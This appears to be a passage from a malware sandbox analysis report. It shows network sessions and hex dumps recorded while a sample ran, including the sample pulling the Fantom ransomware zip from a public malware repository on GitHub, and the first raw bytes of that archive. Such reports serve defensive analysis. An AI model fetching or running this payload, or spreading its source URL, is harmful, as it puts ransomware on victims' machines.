                                                                                                                                                2022-09-29 12:48:33 UTC897INData Raw: 0c 98 40 fb 1a d8 c9 a3 15 40 64 53 58 11 81 e2 ca ad 34 4a 9d 0c a3 b6 8d 48 24 2b b8 db e3 2a 64 8a 83 ad f2 b8 a7 1c f6 70 18 a4 77 d4 90 d2 76 02 de 87 de 17 86 09 a7 24 9f 4e 7e 54 bd 69 72 a5 8a cb 22 c3 80 db 84 2d 94 8f e5 13 0d 4e 1e 2d 47 5b 78 c2 e6 82 ab 10 97 cd 1d ea 91 be 43 80 e3 1b 49 04 32 b3 fd 80 a9 4f 9f 2b 21 bb 25 15 1f 35 70 58 8b 4c 07 f7 4e ae b3 4c 9d 48 bb 91 2d 7d 35 33 d1 57 69 1f fd a6 cc db 0c bc b1 f9 b5 76 0d 04 f0 5e fc ad e2 04 c3 d5 ab 5a 10 3a cb 6c 95 46 b7 ce af e3 10 71 8d f8 48 c0 81 13 8a 4a 69 64 d0 57 bd ca 40 b4 38 3c 16 8d e8 c4 4b ea 6d a3 76 a5 fe 46 83 a5 f1 ae 32 f2 9c 7c 3a 9f c9 0e c8 42 c6 da 81 ec 06 b0 85 19 fb 5a 29 2b d0 93 9b 70 f0 2f 75 61 be ed 07 6a 19 0b 7f 55 fe f8 40 5d 8c 15 0a b2 19 90 3f
                                                                                                                                                Data Ascii: @@dSX4JH$+*dpwv$N~Tir"-N-G[xCI2O+!%5pXLNLH-}53Wiv^Z:lFqHJidW@8<KmvF2|:BZ)+p/uajU@]?
                                                                                                                                                2022-09-29 12:48:33 UTC913INData Raw: 6a 51 3b 17 d1 c6 ce 40 47 99 39 da a3 d1 7b 8e 27 69 88 c2 de 38 91 14 44 b8 e8 72 b8 29 9b c7 8a 58 e9 3c 79 09 9d db d8 de 72 e2 05 29 6c ad 3e c6 70 06 af 35 e2 b8 cb aa 1a 8a 23 c1 c5 ac 64 0b 89 68 49 db 1b 40 97 7b ba c5 da 82 b0 96 ba 3d 3f cc 3c 92 8e 20 39 fc e2 c8 70 12 6a 89 c6 fd 70 bb e7 cf 47 44 00 d2 80 a3 b1 7a 26 38 ff af 8b 0f 50 4b f4 dc 14 ea 73 d7 64 5c 9a df 1c f6 ff cd 2f 13 17 f8 61 eb c1 3e 6d fc 19 81 3d 86 11 ff d0 d8 f4 f8 07 1b 93 fb 34 5c 85 ed 78 39 e8 23 43 31 34 b8 8e c7 b0 34 3d 39 1c 36 71 d1 23 51 2b 3f 51 d1 93 77 ea 23 cb c1 19 1d 3e 34 fb 48 b4 d9 12 9e 85 5f b9 7f b5 63 0b 25 7d a4 f7 f7 7e 8d e8 ee 7f 97 91 58 5e cb 29 bf 55 b7 57 24 69 f7 33 2c 62 5b fe 99 de 85 17 ad 69 ce ef cf 8f 3a 8c c7 f6 9e 1f 8d 0a 16 37
                                                                                                                                                Data Ascii: jQ;@G9{'i8Dr)X<yr)l>p5#dhI@{=?< 9pjpGDz&8PKsd\/a>m=4\x9#C144=96q#Q+?Qw#>4H_c%}~X^)UW$i3,b[i:7
                                                                                                                                                2022-09-29 12:48:33 UTC929INData Raw: b6 21 8e 91 a8 67 92 be 7d 08 74 8a b7 12 b0 a9 a1 39 bb 1b fc 89 65 cb 79 62 ef 1b 71 2e ab 4c 22 f7 db 2a ba 3c 42 cc 87 bf 37 cc 92 31 21 bb 0e dd 89 4f 19 bc 54 02 a9 19 22 56 e8 dd c2 3c 39 8c e7 22 0f 92 cf 3b 9c 32 97 fd 14 c8 7d 5b b2 e3 a1 43 c8 06 b0 ee 8a 03 55 a6 21 f2 d3 0c 4f 5a 5c ed 1b bb b3 1b b2 ef ca fb ad 3b 82 25 aa ee 2c 15 94 3d 4a 24 b8 21 76 90 b7 9a ae d6 aa cf b5 7c 3a 2e 92 38 9c cb 1d 27 71 5f eb 38 16 15 08 9c 9b 86 b1 ca 9b 11 b1 05 79 69 0c be d2 f0 6f 93 ed 1c 4d 69 7b d0 87 2c 37 84 0c 0e c6 af 31 62 4c b5 ab 7b db 24 50 43 03 19 a7 b7 f8 12 1a 7c 16 b0 09 95 34 0b fd 6c d2 87 b3 36 cd c8 11 2d 8a a6 f2 c7 65 34 df 8b 08 fe 71 82 42 f7 00 67 ae a1 40 95 22 f8 e9 84 c8 23 79 0f e5 1c d2 aa c9 69 a5 6b 66 3f 9f 14 c3 af 2f
                                                                                                                                                Data Ascii: !g}t9eybq.L"*<B71!OT"V<9";2}[CU!OZ\;%,=J$!v|:.8'q_8yioMi{,71bL{$PC|4l6-e4qBg@"#yikf?/
                                                                                                                                                2022-09-29 12:48:33 UTC945INData Raw: 6a e8 78 09 62 5e 9e 38 7d f5 a0 90 8b 43 3a c4 59 e1 b5 12 60 52 db c8 26 a6 e9 39 88 85 dc 2d 71 85 48 d6 eb e6 23 fe 3a 47 b1 d6 ad 87 91 a4 e0 6e 00 62 4a ca 74 a6 85 07 5f 3d 1f 0f c3 a9 84 2a ea d1 33 95 af ed f4 c8 7c 32 b5 e0 65 43 3c d8 a8 0e 99 5b f5 bd c7 8f 1a ab 06 02 c4 5d a0 f9 9b 99 f3 fd 34 f2 e8 66 3d d8 08 f7 f4 14 de a7 e8 7c 9f e3 d5 3c 22 a1 8a 86 c9 5b ba 71 b2 b7 f9 db 3f 31 2a 6f fe 19 51 a9 45 09 7f 60 59 34 ed 2c 6d 2e a9 47 ac 3f fa 4d 04 f5 d3 2e 4b 56 82 42 7e 52 a3 69 aa 71 a9 9b 8a 32 71 dd 16 79 6a 56 b2 f3 f7 9a b7 22 c4 b1 4c 2a 27 3e 8e 2e b4 d2 34 41 0e b6 a6 10 c5 98 e0 e9 82 9b 98 7b 18 4a a6 0d 47 d9 12 42 b3 ce b5 56 50 40 8b 25 00 f8 20 9f b0 72 32 99 23 0e c0 25 5e db d7 53 8f dd 1f 33 a0 46 7b 3c 93 a5 30 51 da
                                                                                                                                                Data Ascii: jxb^8}C:Y`R&9-qH#:GnbJt_=*3|2eC<[]4f=|<"[q?1*oQE`Y4,m.G?M.KVB~Riq2qyjV"L*'>.4A{JGBVP@% r2#%^S3F{<0Q
                                                                                                                                                2022-09-29 12:48:33 UTC961INData Raw: 7d 30 10 05 7e 64 0a f8 f5 c1 67 5b 9e ae 27 91 1f d5 ae b9 ef e1 5d a0 da c9 0e fe c7 95 fe 32 7e 96 c0 df 02 7f 2e 1c 21 19 e6 6e 7d 66 a2 6f e5 c6 31 cb c4 85 e6 b0 e5 0e a5 ba a6 2f a1 43 7e 0b 54 d2 61 55 80 0c ea d8 86 b6 a1 49 63 df be a3 d7 7a 98 f8 29 aa 2d f2 76 7c 0b 1b bb f4 e4 e6 f1 83 ec 0b 6f f4 7a 6a 04 1e a6 30 f4 69 c7 2c a5 3a 80 eb d4 1c 6a 0d eb bb 8c 58 bf 33 84 82 90 50 37 a6 37 d0 e2 bf 1f b4 a0 3d a2 35 fe 18 50 ad 05 36 8b f4 fb 34 cb 80 a4 02 ce 76 09 fe c9 40 ad 8e 5b 2d 35 9a 83 43 fe 0d 87 ff 26 00 d4 7f 57 b3 c2 6e 30 ef 51 11 d7 f4 4b 51 09 71 22 ff d5 eb 61 27 31 4b ca c3 ff 7d 20 5a e6 af ad 7b fc a8 97 59 be ed bd 06 8d cb 47 f0 13 ba 4a 1c b5 12 72 c7 d7 16 00 de 4d 58 eb ea 90 8d 73 b7 8b ad d7 31 d1 bb 95 27 33 d4 b2
                                                                                                                                                Data Ascii: }0~dg[']2~.!n}fo1/C~TaUIcz)-v|ozj0i,:jX3P77=5P64v@[-5C&Wn0QKQq"a'1K} Z{YGJrMXs1'3
                                                                                                                                                2022-09-29 12:48:33 UTC977INData Raw: ea 92 64 f9 eb 4a cf 3a 34 a4 57 e3 80 a5 3b 12 a5 66 8b ce b1 85 9d d3 6f 83 bd e8 59 54 6a bb 52 62 d6 d1 0c c5 9d 29 c1 50 f4 a4 4c 07 5e c7 1f ee 44 c6 ba f6 1f df 08 9e d3 dd fd e7 75 12 a8 66 49 08 39 cd f6 5f e6 57 a1 97 1b 01 bd c2 06 ff 2f 1e f3 ec f7 1a 91 c7 14 bd 37 56 62 ee 8f 97 cd 23 56 dd 0e 02 8b 45 02 09 8f f9 72 0d e7 80 8b 61 a0 53 b3 a1 67 22 a8 b1 e2 03 d4 a2 96 24 e8 db 52 0b 62 28 c7 55 23 0f ed 96 02 8e 52 d6 77 51 8c 4a e7 b0 a0 0a d6 51 ac 72 07 c1 d6 18 8e 88 5e 8b ad 1f b5 4e cb 07 1b ad 7e 61 20 42 4e 08 28 44 2f 52 80 1f 69 5a 39 c6 6f bb 8e 27 86 94 7d 3e cf d5 0e 5c 0d a5 c5 60 dc aa 1d 72 50 73 12 96 ef df 2e 96 98 18 27 d3 1c 17 94 cf 11 b3 9d cf 03 29 4b 70 65 7c 64 0b 2b 56 96 40 93 e7 98 6b 5d 58 f3 0c e1 9e fc d2 9c
                                                                                                                                                Data Ascii: dJ:4W;foYTjRb)PL^DufI9_W/7Vb#VEraSg"$Rb(U#RwQJQr^N~a BN(D/RiZ9o'}>\`rPs.')Kpe|d+V@k]X
                                                                                                                                                2022-09-29 12:48:33 UTC993INData Raw: 59 67 0b 19 d2 f6 5f 01 a2 23 bd 79 71 d9 51 c5 66 a3 db 61 58 c5 b5 84 91 db e6 4c 5f 1f a6 01 62 b5 4d 19 cb ac a4 96 05 56 eb 21 19 ca 05 7c 36 a0 2c 19 f9 c6 34 79 a7 b9 3c bf e3 98 1c 55 23 6a 3b b2 c9 dc 49 2a bb 2b 45 e7 55 1c 92 35 1e 80 b0 ee 62 fc 69 b7 35 d9 62 0e fb 2f e2 a2 f7 bf 68 ec 11 ef be 22 55 ba f5 aa ef 8c 51 ea 69 31 a7 e2 5d 52 7e 4c 5f a1 97 01 ae 20 2a 17 a8 21 db 16 30 ef c6 ab c4 d3 b2 1a 79 78 79 9e aa c4 e4 00 92 fa 28 68 de e8 80 f7 92 0f c2 c3 8f 76 3e 51 2e 0b 9c 6a cb c6 d4 6a 2a c2 ff 57 d3 ab ea 35 ef 57 df 8e df b8 12 55 b6 d9 46 ec 08 2a cb 14 c9 5b 14 f2 af 4e a8 67 20 66 49 17 4b 2e 86 ce 1e 93 de 14 8e 83 4d ab f1 38 69 30 8d 31 65 58 41 bc 90 f1 20 4f ed d0 93 7f a1 ee e0 13 d9 a8 d6 87 e5 30 3b b8 84 b1 7c e8 c5
                                                                                                                                                Data Ascii: Yg_#yqQfaXL_bMV!|6,4y<U#j;I*+EU5bi5b/h"UQi1]R~L_ *!0yxy(hv>Q.jj*W5WUF*[Ng fIK.M8i01eXA O0;|
                                                                                                                                                2022-09-29 12:48:33 UTC1009INData Raw: 62 20 07 65 82 ef b6 c3 26 8a 95 c8 ce 62 ca 7b c0 24 f5 91 07 80 47 91 95 0a 63 7d 18 ca 6f 2a ea bb 08 ba 6c 25 4d 50 0d 36 e3 fe bb 25 5f 53 62 ef 69 d9 76 00 66 a9 60 ca ed 4f 9c cb 74 e8 d4 3a 4a 2d 29 3e 59 ef 00 0c 9d 7b 9e eb 1f db 61 ef e7 f6 79 2b 17 7b f8 d1 9a 78 57 52 55 cf e6 80 41 70 c2 67 18 5c 16 f2 81 20 79 b5 65 df 54 2a 01 cb 3e 65 c1 81 a7 58 a2 78 0d 31 23 96 06 0a 77 2e 32 f7 28 9e 00 a0 21 1b 27 55 63 51 dd 6d 53 c2 ae 3c f6 72 45 75 f7 17 94 70 15 85 eb a3 47 3f e0 dc 4a c9 ad b4 51 d5 5a 64 08 26 00 6a 46 bd 91 7f 26 68 53 e9 21 ba 45 63 57 4f 06 4f 8b f7 31 4c ab cf 38 dc 49 1a 79 dd a4 ff a2 27 5c ec af f5 76 ea 32 bd 83 94 f9 c7 38 b5 52 06 bc 13 36 46 64 91 40 05 7d 1e e5 31 ab e8 34 57 17 1d 6e e6 0f f5 70 b2 f9 30 3d 1e 4e
                                                                                                                                                Data Ascii: b e&b{$Gc}o*l%MP6%_Sbivf`Ot:J-)>Y{ay+{xWRUApg\ yeT*>eXx1#w.2(!'UcQmS<rEupG?JQZd&jF&hS!EcWOO1L8Iy'\v28R6Fd@}14Wnp0=N
                                                                                                                                                2022-09-29 12:48:33 UTC1025INData Raw: c8 d0 e4 53 5f 9c b4 59 61 54 26 36 c1 e0 f4 af 77 d8 1b e0 16 62 41 ea 11 20 7b 0b 1e 29 22 0e 39 31 d7 f9 ac e8 3b aa 3f 02 c1 0d d9 82 8b 34 bd a7 cd 71 19 1b a5 0a 72 f1 23 83 3a a2 a0 73 17 cb ef c9 ea 86 9b 87 72 26 f6 c1 13 00 52 a1 7a 5e 92 93 ac 86 bc a4 a1 ca e3 88 a8 a7 2e bd 62 40 89 83 02 79 11 73 2b d0 03 a9 8f 94 78 d0 fb 39 4c 1b 73 ee e4 37 1b da f6 bc c5 5f 8f 0a 11 ca 98 31 2d eb 9f 06 d0 72 ed 42 b1 e2 23 09 ee 51 19 74 8b a5 7e 7d 20 d2 f5 4a ed ab d7 b2 af 6e c0 5c da c2 7e d5 91 53 97 ce 4e e9 1a 88 d7 90 b4 6f 8c fb 89 2d 93 6a 56 28 b8 0d f5 86 c3 6b f4 d8 b7 22 cf 64 0c 76 6a ec 66 b6 21 c5 1f db 57 2f 1b cc 76 38 92 bb 04 fc 51 22 aa 4e 9f 5c bf 2a 38 85 cb cd 03 c9 01 85 c5 70 93 95 0d d3 73 70 5b 6d 9d 97 82 31 a1 da 02 54 cd
                                                                                                                                                Data Ascii: S_YaT&6wbA {)"91;?4qr#:sr&Rz^.b@ys+x9Ls7_1-rB#Qt~} Jn\~SNo-jV(k"dvjf!W/v8Q"N\*8psp[m1T
                                                                                                                                                2022-09-29 12:48:33 UTC1041INData Raw: ed 23 ce 39 6c 23 6e 2e 6a 28 94 cb e6 16 51 1a 99 5f 79 ac 45 b9 e3 c5 21 0f 45 55 8e fd 4b 68 5d e8 5c 22 32 99 7f c9 87 57 a7 3c f0 df 6c aa 77 a3 04 f4 a4 77 e5 a8 c6 be 46 bd c3 15 5a ee 08 e8 b9 df ec f5 d8 b3 44 fb 98 d3 3a ae a8 ec b9 64 8c c5 30 2f 3d a8 9d ff 7c 00 be ab 9b 32 b5 13 d8 03 5f 0f 90 33 b5 75 23 7e d8 db 15 85 c8 a1 42 68 74 75 d1 8f d0 63 97 1b 75 ff 4c a0 54 3d 53 57 18 c9 95 b4 55 32 13 88 50 83 34 47 6f bb 2e 48 b2 13 52 35 32 19 09 d7 73 65 77 9b 71 92 53 a5 c8 d8 a0 3f 85 ba 1a 29 88 d7 6f 48 45 fb 61 e0 e4 b0 08 18 d2 97 c1 a0 4c 2d 84 03 da e8 9a ce 0b 12 6d d1 91 a9 33 8b 2a 0e 62 cc d3 ac 9d 87 48 cf f5 3a 6b 83 10 a7 e3 bb 93 89 5b d1 62 20 b1 2c 53 ba d8 a5 9d f2 64 06 aa db ed bc ff d4 2e 7c 59 b0 9b e5 c9 40 aa f7 7d
                                                                                                                                                Data Ascii: #9l#n.j(Q_yE!EUKh]\"2W<lwwFZD:d0/=|2_3u#~BhtucuLT=SWU2P4Go.HR52sewqS?)oHEaL-m3*bH:k[b ,Sd.|Y@}
                                                                                                                                                2022-09-29 12:48:33 UTC1057INData Raw: 3b 25 07 ee 34 33 31 fa 6c 7d a0 6b bc 6a d6 11 8c 9e 82 19 95 d0 06 df 22 a8 5c 08 49 d2 8b d5 19 c2 8c 0d a2 5a 7a c0 78 1a ee de 7a 27 d3 ad 07 fd c4 dc 32 7d 0f d1 04 90 79 c1 c0 19 3b df b5 06 69 e9 33 0b 62 be d1 70 96 31 aa 2b 16 e6 90 44 e6 d2 32 77 fa b0 79 60 e1 9f 61 fd d4 23 39 85 a0 d3 57 b0 80 db e9 ee 18 6a e8 09 41 22 fa f0 8a 42 94 b2 13 5b c0 98 22 4a 77 15 e1 56 05 d4 6b 2e 90 76 06 a6 b4 83 65 be b4 23 48 36 70 fe 96 f9 7e a1 71 f2 c2 76 79 8d 51 f1 35 fe 7e b7 ea 48 40 ef ef 22 a0 6a 24 76 6f 97 c1 a1 aa ae 38 20 ac fa f8 76 17 5a 7f 80 0c ec bb f8 20 be 12 49 cf a1 68 e3 2c 90 1f 2e 43 98 c2 84 9a c3 33 0b ba 9e 8d d3 10 a0 31 92 b9 2e 48 57 f2 3a 41 bd e0 a3 62 ee 68 b6 c1 c0 36 6c 4f e6 cd d9 5d 82 c4 95 f2 f2 8e 01 3f a5 65 aa 89
                                                                                                                                                Data Ascii: ;%431l}kj"\IZzxz'2}y;i3bp1+D2wy`a#9WjA"B["JwVk.ve#H6p~qvyQ5~H@"j$vo8 vZ Ih,.C31.HW:Abh6lO]?e
                                                                                                                                                2022-09-29 12:48:33 UTC1073INData Raw: e8 3b 83 43 7c c0 eb 31 ba a4 a1 ae df ae 75 3a c4 ff 70 58 8e 50 a1 8c 96 ab 83 09 d0 83 4c d9 b6 71 b5 dc 90 c1 5b a6 d0 08 ad 02 5a 87 36 56 6e 84 a1 8d 16 1c 94 9b c3 db 0c 1a f4 71 20 e8 27 17 63 10 ff ee eb e3 f2 65 2d d9 be d0 4b 7b 7d 29 da ef e1 42 37 3c a5 78 ac 52 1b f0 6a 91 6b 64 78 fc 70 a4 4f e8 05 0e 03 9d 16 5a c6 55 67 ea 85 fb 57 1b ae 66 bf 27 47 01 80 d8 bc 35 49 d3 47 0b a4 06 d2 af 85 87 97 cc ed a1 9b 5d 29 b5 6b ee 5d de ab 5c b0 8d 50 db 0c ff 6d 77 0f 60 ca da fc 62 53 69 d1 6e 24 67 51 2a ad 5b f8 b2 84 cc 9f be 50 6e b1 63 c7 f7 48 37 cf 18 f1 53 a8 49 b8 ee 57 35 c8 15 65 4b c2 04 0c 87 f2 ba 90 04 4d 72 89 bd 6b 1e 4e 1a 93 a9 66 4a c7 1b 64 1c 7c 5a 34 83 a8 a4 16 3b f2 98 b6 8c 6c 34 9e b3 e5 4a 8d c0 30 66 76 06 a1 de c6
                                                                                                                                                Data Ascii: ;C|1u:pXPLq[Z6Vnq 'ce-K{})B7<xRjkdxpOZUgWf'G5IG])k]\Pmw`bSin$gQ*[PncH7SIW5eKMrkNfJd|Z4;l4J0fv
                                                                                                                                                2022-09-29 12:48:33 UTC1089INData Raw: 3a 88 29 ac 3a d9 19 67 d4 0b 1e a8 7d 6e 14 f8 37 b8 7b 2e 60 c1 d3 72 89 e8 b3 d6 5d f8 6c b1 4e e9 fe 7e 11 72 ba d7 5b 54 06 96 4a 64 5a 8c 4a ff 2f 49 7d 5f b1 47 3a ea a8 e5 f0 b9 c9 bb b0 70 c2 49 ca 32 4b 10 1d ca c4 40 cd 13 67 3d 21 fe 93 ee c4 75 d5 20 94 e3 f2 6a 46 ab 6a 21 70 32 7e bb 67 68 8c bd 59 b5 bc ab d0 e6 9c 37 46 33 96 2f 0e ef a2 67 ee 4a 4d 6b 42 75 cc 1d f8 01 2d 25 c1 7e 37 a5 fa bc e0 80 0c 08 6a a9 13 2a 33 1c f0 4d 34 00 36 be 77 af 93 db 9f 92 4e d5 96 10 47 47 8a 98 cd ce 35 15 f6 41 1c f3 2d 42 fc 84 b1 ba f7 8f 43 8c fa eb 0d 63 0a d0 55 56 73 2a 43 31 fc d1 38 33 9e 58 43 7b 23 1d 01 48 ce c6 85 65 56 07 cd 3c 27 8f 2a 31 3d 1b 9f 4b 2b 42 4d a0 40 8a 73 c7 21 d6 7c a1 ad 87 51 c4 41 f0 be 7b 87 36 42 8d 7c 9c 96 23 de
                                                                                                                                                Data Ascii: :):g}n7{.`r]lN~r[TJdZJ/I}_G:pI2K@g=!u jFj!p2~ghY7F3/gJMkBu-%~7j*3M46wNGG5A-BCcUVs*C183XC{#HeV<'*1=K+BM@s!|QA{6B|#


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                2192.168.2.34968323.50.105.163443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:09 UTC179OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                                                Host: fs.microsoft.com
                                                                                                                                                2022-09-29 12:48:09 UTC179INHTTP/1.1 200 OK
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                ApiVersion: Distribute 1.1
                                                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                X-Azure-Ref: 07xA1YwAAAAANlFLDDfUFRpn0EiXpbHv1TE9OMjFFREdFMTgyMQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                Cache-Control: public, max-age=225621
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:09 GMT
                                                                                                                                                Connection: close
                                                                                                                                                X-CID: 2


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                20192.168.2.349693140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:34 UTC1092OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zip HTTP/1.1
                                                                                                                                                Host: github.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                21140.82.121.4443192.168.2.349693C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:34 UTC1092INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:46:37 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:48:34 UTC1093INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                22192.168.2.349694185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:34 UTC1094OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                23185.199.108.133443192.168.2.349694C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:34 UTC1095INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 203087
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "0f6cd0c854741d82e79b6fae3ecfc41f9b92740bab354e2ee252955917725cf0"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 0846:E4BC:5E09CA:68A9EF:63359324
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:34 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6960-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455715.808764,VS0,VE1
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 2cf7e5c8f3025f07811fbfe99e8b45dfc4270fd3
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:53:34 GMT
                                                                                                                                                Source-Age: 255
                                                                                                                                                2022-09-29 12:48:34 UTC1095INData Raw: 50 4b 03 04 14 00 01 00 08 00 64 01 cd 4c 5a 74 a2 37 b5 18 03 00 00 16 04 00 0a 00 00 00 46 61 6e 74 6f 6d 2e 65 78 65 22 e7 f0 5b 88 6d 31 c8 1f 0b 7d 88 55 e3 33 f2 2a 91 e5 3a 5c 0e c4 5d 37 ee df 6e 5b a7 3d 5a a3 07 6d 88 45 a4 dc 8e 0a a0 0d 92 93 68 24 00 5c 40 19 4d 80 d5 9b c0 88 7e f4 e8 b1 12 2b e0 d8 eb 5f 40 26 3d 64 73 cf d8 7a 1d c8 74 62 56 d5 b5 6b bc c5 66 0c a3 c2 21 35 45 5c c6 a6 10 d6 9a 5f 61 cd b8 bd e2 41 ee 82 d1 88 dd bf 72 be cc b3 c5 72 36 49 19 d7 76 d2 2d 53 e4 de 95 e6 c9 b4 f0 49 f6 d6 ba f6 d0 5f a3 e9 83 90 3f 14 c4 e8 e9 a9 62 03 42 67 dc d3 0d 07 9f 7e 98 1e 50 4b b2 7a 2c 80 44 b5 9f 42 81 88 d5 88 42 ab ab 3c d2 27 98 7c df c6 d3 8e 82 7a 18 17 a0 bc c6 4a cf 60 40 eb 61 1b d0 ed 8e 15 2f 5e 30 68 c8 39 9a 73 d2 34
                                                                                                                                                Data Ascii: PKdLZt7Fantom.exe"[m1}U3*:\]7n[=ZmEh$\@M~+_@&=dsztbVkf!5E\_aArr6Iv-SI_?bBg~PKz,DBB<'|zJ`@a/^0h9s4
                                                                                                                                                2022-09-29 12:48:34 UTC1097INData Raw: 9d a1 23 c2 56 51 00 b0 6d 35 4f 92 bb 15 ab 8f bc 79 27 e8 6a 86 71 01 e0 ef 54 14 7b 97 1c c6 c3 7e af 72 ec 05 50 a3 f6 8a 2d 64 ff c0 58 73 a9 45 21 eb af ba f5 c5 c6 25 18 4d bc 96 42 9c 13 e2 e1 44 03 9f 83 bf ad ad 80 b7 a9 69 e6 97 63 4b fa a7 12 a0 e4 b3 07 37 fb 4f b3 e1 64 a6 e5 aa 93 fb 9e 29 7b a9 24 06 f2 e9 3c 73 0a 0e 1e 6b 57 ca 2c 01 96 93 c0 7a fc 38 6c 6d 06 33 41 96 a5 56 5e 35 2b f1 59 02 1b dc 15 b4 f6 be 3d 5a 29 bd f0 a7 1b f7 ab 64 4e e3 7b b5 b5 af aa 28 71 0c 4d 66 5f e2 da 44 63 0d fe 68 83 0b bb 26 40 ae 82 d0 25 85 cb 7b 0c bd 12 6c f8 32 ca fc ec 91 1e 63 10 c3 96 2b bc be 2f 8c b8 e1 74 3f 3f 08 82 ea 66 45 2d 1d 96 cd 52 24 b3 86 f0 01 a1 e7 e1 6a 6c fc ff b2 fd 80 cb d6 7f b8 6e 98 84 ea bd 20 f7 00 05 48 e4 f5 77 2a 41
                                                                                                                                                Data Ascii: #VQm5Oy'jqT{~rP-dXsE!%MBDicK7Od){$<skW,z8lm3AV^5+Y=Z)dN{(qMf_Dch&@%{l2c+/t??fE-R$jln Hw*A
